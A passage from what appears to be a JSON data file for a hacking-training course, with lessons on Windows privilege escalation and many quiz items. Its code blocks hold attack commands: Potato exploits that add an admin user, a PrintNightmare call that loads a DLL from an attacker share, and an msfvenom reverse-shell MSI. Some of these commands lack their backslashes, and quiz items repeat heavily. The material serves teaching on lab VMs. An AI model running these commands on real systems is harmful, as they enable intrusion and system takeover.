output."},{"type":"quiz","q":"What's needed for unquoted service path exploit?","opts":["Spaces in path without quotes","Service disabled","TCP service","Network drive path"],"ans":0},{"type":"quiz","q":"A NOP sled is used to...","opts":["Increase the target area for the shellcode jump","Encrypt the payload","Compress the exploit","Speed up execution"],"ans":0},{"type":"quiz","q":"What tool generates Metasploit payloads?","opts":["nmap","msfvenom","hashcat","burpsuite"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"potato-attacks","cat":"Privilege Escalation","title":"Potato Attacks (Windows)","diff":3,"xp":250,"intro":"The Potato family exploits token impersonation through NTLM relay.","sections":[{"type":"text","content":"Potato attacks exploit SeImpersonatePrivilege by tricking SYSTEM into authenticating to a controlled listener."},{"type":"code","lang":"powershell","content":"# GodPotato\n.GodPotato.exe -cmd 'cmd /c whoami'\n# SweetPotato\n.SweetPotato.exe -a 'cmd /c net user hacker P@ss /add'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Common prerequisite for Potato attacks?","opts":["Admin access","SeImpersonatePrivilege","Network access","Physical access"],"ans":1},{"type":"quiz","q":"Which register typically holds the return address on x86?","opts":["EAX","ESP","EIP","EBX"],"ans":2},{"type":"quiz","q":"What is a 0-day exploit?","opts":["An exploit from day zero of a project","An exploit for an unpatched/unknown vulnerability","An expired exploit","A one-day old exploit"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"printnightmare","cat":"Privilege Escalation","title":"PrintNightmare (CVE-2021-34527)","diff":3,"xp":250,"intro":"Critical Print Spooler vuln: SYSTEM from any authenticated user.","sections":[{"type":"text","content":"PrintNightmare exploits the Windows Print Spooler to load a malicious DLL as SYSTEM."},{"type":"code","lang":"bash","content":"rpcdump.py @10.10.10.5 | grep -i spooler\npython3 CVE-2021-34527.py 'domain/user:pass@10.10.10.5' '\\YOUR_IPshareevil.dll'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Which service does PrintNightmare exploit?","opts":["Task Scheduler","Print Spooler","Windows Update","Remote Desktop"],"ans":1},{"type":"quiz","q":"Shellcode must be position-independent because...","opts":["It runs faster","Its load address is unknown at write time","The CPU requires it","It avoids antivirus"],"ans":1},{"type":"quiz","q":"A NOP sled is used to...","opts":["Increase the target area for the shellcode jump","Encrypt the payload","Compress the exploit","Speed up execution"],"ans":0},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"registry-autorun","cat":"Privilege Escalation","title":"Windows Registry Autorun","diff":1,"xp":75,"intro":"Autorun keys execute programs at login.","sections":[{"type":"text","content":"Several registry keys run programs at user login. If the binary is writable, replace it with your payload."},{"type":"code","lang":"cmd","content":"reg query HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun\nicacls \"C:Program FilesAutoAppapp.exe\""},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"When do HKCU Run key programs execute?","opts":["At boot","When current user logs in","Every hour","On service start"],"ans":1},{"type":"quiz","q":"What tool generates Metasploit payloads?","opts":["nmap","msfvenom","hashcat","burpsuite"],"ans":1},{"type":"quiz","q":"Which register typically holds the return address on x86?","opts":["EAX","ESP","EIP","EBX"],"ans":2},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"always-install-elevated","cat":"Privilege Escalation","title":"AlwaysInstallElevated","diff":1,"xp":75,"intro":"Both policies set = any MSI runs as SYSTEM.","sections":[{"type":"text","content":"If AlwaysInstallElevated is enabled in HKLM and HKCU, any MSI installs with SYSTEM privileges."},{"type":"code","lang":"cmd","content":"reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o evil.msi\nmsiexec /quiet /qn /i evil.msi"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Both policies must be set to what value?","opts":["0x0","0x1","0xff","0x10"],"ans":1},{"type":"quiz","q":"What is a 0-day exploit?","opts":["An exploit from day zero of a project","An exploit for an unpatched/unknown vulnerability","An expired exploit","A one-day old exploit"],"ans":1},{"type":"quiz","q":"Shellcode must be position-independent because...","opts":["It runs faster","Its load address is unknown at write time","The CPU requires it","It avoids antivirus"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"named-pipe-impersonation","cat":"Privilege Escalation","title":"Named Pipe Impersonation","diff":3,"xp":250,"intro":"Create a pipe, trick SYSTEM into connecting, impersonate its token.","sections":[{"type":"text","content":"Named pipes are an IPC mechanism. If SYSTEM connects to your pipe, you impersonate its token."},{"type":"code","lang":"bash","content":"# This is the basis of many Potato exploits\n# Create a named pipe server, wait for SYSTEM to connect\n# Then impersonate the connecting token"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"What is a named pipe?","opts":["A network socket","An IPC channel","A file encryption method","A kernel module"],"ans":1},{"type":"quiz","q":"A NOP sled is used to...","opts":["Increase the target area for the shellcode jump","Encrypt the payload","Compress the exploit","Speed up execution"],"ans":0},{"type":"quiz","q":"What tool generates Metasploit payloads?","opts":["nmap","msfvenom","hashcat","burpsuite"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"runas-saved-creds","cat":"Privilege Escalation","title":"Runas with Saved Credentials","diff":1,"xp":50,"intro":"Windows stores credentials for 'Run as different user'.","sections":[{"type":"text","content":"cmdkey stores credentials. If admin creds are cached, use runas /savecred."},{"type":"code","lang":"cmd","content":"cmdkey /list\nrunas /savecred /user:DOMAINadmin cmd.exe"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"What lists saved Windows credentials?","opts":["net user","cmdkey /list","whoami /priv","dir /s cred*"],"ans":1},{"type":"quiz","q":"Which register typically holds the return address on x86?","opts":["EAX","ESP","EIP","EBX"],"ans":2},{"type":"quiz","q":"What is a 0-day exploit?","opts":["An exploit from day zero of a project","An exploit for an unpatched/unknown vulnerability","An expired exploit","A one-day old exploit"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"scheduled-task-abuse","cat":"Privilege Escalation","title":"Scheduled Task Abuse","diff":2,"xp":150,"intro":"A task runs a writable script as SYSTEM.","sections":[{"type":"text","content":"If a scheduled task's binary is writable, replace it with your payload."},{"type":"code","lang":"powershell","content":"schtasks /query /fo LIST /v | findstr /i \"task|run\"\nicacls \"C:Scripts\\backup.ps1\""},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"What tool manages scheduled tasks?","opts":["services.msc","schtasks","taskmgr","regedit"],"ans":1},{"type":"quiz","q":"Shellcode must be position-independent because...","opts":["It runs faster","Its load address is unknown at write time","The CPU requires it","It avoids antivirus"],"ans":1},{"type":"quiz","q":"A NOP sled is used to...","opts":["Increase the target area for the shellcode jump","Encrypt the payload","Compress the exploit","Speed up execution"],"ans":0},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI 